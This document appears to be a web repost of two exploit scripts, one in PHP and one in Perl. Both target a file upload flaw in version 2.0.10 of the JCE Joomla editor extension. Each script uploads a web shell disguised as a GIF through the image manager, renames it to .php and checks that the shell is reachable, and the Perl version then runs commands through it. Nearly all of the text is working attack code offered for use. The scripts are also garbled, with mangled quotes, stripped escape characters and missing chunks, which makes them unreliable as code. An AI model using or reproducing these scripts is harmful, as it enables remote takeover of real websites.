PHP Version:
[cc lang=”php”] 7.5
# Coded By: Mostafa Azizi
###################################################################################################

error_reporting(0);
ini_set(“max_execution_time”,0);
ini_set(“default_socket_timeout”, 2);
ob_implicit_flush (1);

echo’

JCE Joomla Extension Remote File Upload

JCE Joomla Extension
Remote File Upload

hostname
(ex:www.sitename.com):
*

path (ex: /joomla/ or
just / ):
*

Please specify a file to upload:
*

specify a port (default is 80):

Proxy (ip:port):

* fields are
required

‘;

function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
$proxy_regex = ‘(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)’;
global $proxy, $host, $port, $html, $user, $pass;
if ($proxy == ”)
{
$ock = fsockopen($host,$port);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo ‘ No response from ‘.htmlentities($host).’

‘;
die;
}
} else
{
$parts = explode(‘:’,$proxy);
echo ‘Connecting to proxy:
‘.$parts[0].’:’.$parts[1].’ …

‘;
$ock = fsockopen($parts[0],$parts[1]);
stream_set_timeout($ock, 5);
if (!$ock)
{
echo ‘No response from proxy…
‘;
die;
}
}

fputs($ock,$packet);
if ($response == 1)
{
if ($proxy == ”)
{
$html = ”;
while (!feof($ock))
{
$html .= fgets($ock);
}
} else
{
$html = ”;
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html .= fread($ock,1);
}
}
} else $html = ”;

fclose($ock);
if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
if ($s==1){
$count=0;
$res=nl2br(htmlentities($html));
$str =
array(‘2.0.11</title’,’2.0.12Target patched.

“;
die();
}
}
if ($count=10) echo ‘Target is
exploitable.

‘;
}
}

$host = $_POST[‘host’];
$path = $_POST[‘path’];
$port = $_POST[‘port’];
$proxy = $_POST[‘proxy’];

if (isset($_POST[‘Submit’]) && $host != ” && $path != ”)
{

$port=intval(trim($port));
if ($port==”) {$port=80;}
if (($path[0]<>‘/’) or ($path[strlen($path)-1]<>‘/’)) {die(‘Error… check the path!‘);}
if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
$host=str_replace(“rn”,””,$host);
$path=str_replace(“rn”,””,$path);

/* Packet 1 –> Checking Exploitability */
$packet = “GET
“.$p.”/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1rn”;
$packet .= “Host: “.$host.”rn”;
$packet .= “User-Agent: BOT/0.1 (BOT for JCE) rnrnrnrn”;

sendpacket($packet,1,0,1);

/* Packet 2 –> Uploading shell as a gif file */

$content = “GIF89a1n”;
$content .= file_get_contents($_FILES[‘datafile’][‘tmp_name’]);
$data = “—————————–41184676334rn”;
$data .= “Content-Disposition: form-data; name=”upload-dir”rnrn”;
$data .= “/rn”;
$data .= “—————————–41184676334rn”;
$data .= “Content-Disposition: form-data; name=”Filedata”;
filename=””rn”;
$data .= “Content-Type: application/octet-streamrnrnrn”;
$data .= “—————————–41184676334rn”;
$data .= “Content-Disposition: form-data;
name=”upload-overwrite”rnrn”;
$data .= “0rn”;
$data .= “—————————–41184676334rn”;
$data .= “Content-Disposition: form-data; name=”Filedata”;
filename=”0day.gif”rn”;
$data .= “Content-Type: image/gifrnrn”;
$data .= “$contentrn”;
$data .= “—————————–41184676334rn”;
$data .= “0dayrn”;
$data .= “—————————–41184676334rn”;
$data .= “Content-Disposition: form-data; name=”action”rnrn”;
$data .= “uploadrn”;
$data .= “—————————–41184676334–rnrnrnrn”;
$packet = “POST
“.$p.”/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743
HTTP/1.1rn”;
$packet .= “Host: “.$host.”rn”;
$packet .= “User-Agent: BOT/0.1 (BOT for JCE)rn”;
$packet .= “Content-Type: multipart/form-data;
boundary=—————————41184676334rn”;
$packet .= “Accept-Language: en-us,en;q=0.5rn”;
$packet .= “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”;
$packet .= “Cookie:
6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743;
jce_imgmanager_dir=%2F;
__utma=216871948.2116932307.1317632284.1317632284.1317632284.1;
__utmb=216871948.1.10.1317632284; __utmc=216871948;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)rn”;
$packet .= “Connection: Closern”;
$packet .= “Proxy-Connection: closern”;
$packet .= “Content-Length: “.strlen($data).”rnrnrnrn”;
$packet .= $data;

sendpacket($packet,0,0,0);

/* Packet 3 –> Change Extension from .gif to .php */

$packet = “POST
“.$p.”/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
HTTP/1.1rn”;
$packet .= “Host: “.$host.”rn”;
$packet .= “User-Agent: BOT/0.1 (BOT for JCE) rn”;
$packet .= “Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn”;
$packet .= “Accept-Language: en-US,en;q=0.8rn”;
$packet .= “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn”;
$packet .= “Content-Type: application/x-www-form-urlencoded;
charset=utf-8rn”;
$packet .= “Accept-Encoding: deflaten”;
$packet .= “X-Request: JSONrn”;
$packet .= “Cookie:
__utma=216871948.2116932307.1317632284.1317639575.1317734968.3;
__utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=216871948.20.10.1317734968; __utmc=216871948;
jce_imgmanager_dir=%2F;
6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182rn”;
$ren
=”json={“fn”:”folderRename”,”args”:[“/0day.gif”,”0day.php”]}”;
$packet .= “Content-Length: “.strlen($ren).”rnrn”;
$packet .= $ren.”rnrn”;

sendpacket($packet,1,0,0);

/* Packet 4 –> Check for successfully uploaded */

$packet = “Head “.$p.”/images/stories/0day.php HTTP/1.1rn”;
$packet .= “Host: “.$host.”rn”;
$packet .= “User-Agent: BOT/0.1 (BOT for JCE) rnrnrnrn”;

sendpacket($packet,1,0,0);

if(stristr($html , ‘200 OK’) != true)
{echo “Exploit Faild…“;} else echo
Exploit
Succeeded…
http://$host:$port$path”.”/images/stories/0day.php
“;
}
?>[/cc]

Perl Version:

[cc lang=”perl”]######################################### www.bugreport.ir
########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 – PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch:
http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) –> 7.5
# Coded By: Mostafa Azizi
###################################################################################################
use IO::Socket;
use LWP::Simple;
system(“cls”);
if(!defined($ARGV[0])) {
print “nnt.::. Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 .::.nn”;
print “t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)
||||nn”;
print “t+–> Usage: perl $0 <--+n"; print "t+--> Example: perl $0 localhost <--+nn"; exit; } print "nnt.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::.nn"; print "t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) ||||nn"; $TARGET = $ARGV[0]; $PORT = "80"; $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"; $SHELL = "/images/stories/0day.php?cmd="; $HTTP = "http://"; $header1G = "GET $SCRIPT HTTP/1.1"; $header1H = "HEAD /images/stories/0day.php HTTP/1.1"; $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1"; $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"; $header2 = "Host: $TARGET"; $header3 = "User-Agent: BOT/0.1 (BOT for JCE)"; $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334"; $header5 = "Content-Length: 769"; $header6 = "-----------------------------41184676334"; $header7 = 'Content-Disposition: form-data; name="upload-dir"'; $header8 = '/'; $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""'; $header10 = 'Content-Type: application/octet-stream'; $header11 = 'Content-Disposition: form-data; name="upload-overwrite"'; $header12 = "0"; $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"'; $header14 = 'Content-Type: image/gif'; $header15 = 'GIF89aG'; $header16 = "“;
$header17 = ‘Content-Disposition: form-data; name=”upload-name”‘;
$header18 = ‘0day’;
$header19 = ‘Content-Disposition: form-data; name=”action”‘;
$header20 = ‘upload’;
$header21 = “—————————–41184676334–“;
$header22 = ‘X-Request: JSON’;
$header23 = ‘Content-Type: application/x-www-form-urlencoded; charset=utf-8’;
$header25 = ‘json={“fn”:”folderRename”,”args”:[“/0day.gif”,”0day.php”]}’;
$header24 = “Content-Length: “.length($header25).””;

############################################### Packet 1 –> Checking
Exploitability #########################################################
print “n[*] Checking Exploitability …nn”;
sleep 2;
$pageURL=$TARGET.$SCRIPT;
$simplePage=get($pageURL);
@arr =
(“2.0.11 Uploading
shell as a gif file
#########################################################
$remote = IO::Socket::INET->new(Proto=>”tcp”,PeerAddr=>”$TARGET”
,PeerPort=>”$PORT”)
|| die “Can’t connect to $TARGET”;
print “[*] Trying to upload 0day.gif …nn”;
print $remote
“$header1Pn$header2n$header3n$header4n$header5nn$header6n$header7nn$header8n$header6n$header9n$header10nnn$header6n$header11nn$header12n$header6n$header13n$header14nn$header15n$header16n$header6n$header17nn$header18n$header6n$header19nn$header20n$header21nn”;
sleep 2;
############################################### Packet 3 –> Change
Extension from .gif to .php
#########################################################
print “[*] Trying to change extension from .gif to .php …nn”;
$remote = IO::Socket::INET->new(Proto=>”tcp”,PeerAddr=>”$TARGET”
,PeerPort=>”$PORT”)
|| die “Can’t connect to $TARGET”;
print $remote
“$header1P2n$header2n$header3n$header23n$header22n$header24nn$header25nn”;
############################################### Packet 4 –> Check for
successfully uploaded
#########################################################
$shellurl=$TARGET.$SHELL;
$output=get($shellurl);
while ($output = <$remote> ) {
if ($output =~ /200 OK/) {
print “[+] 0day.php was successfully uploadednn”;
print “[+] Path:”.$TARGET.$SHELL.”idn”;
}}[/cc]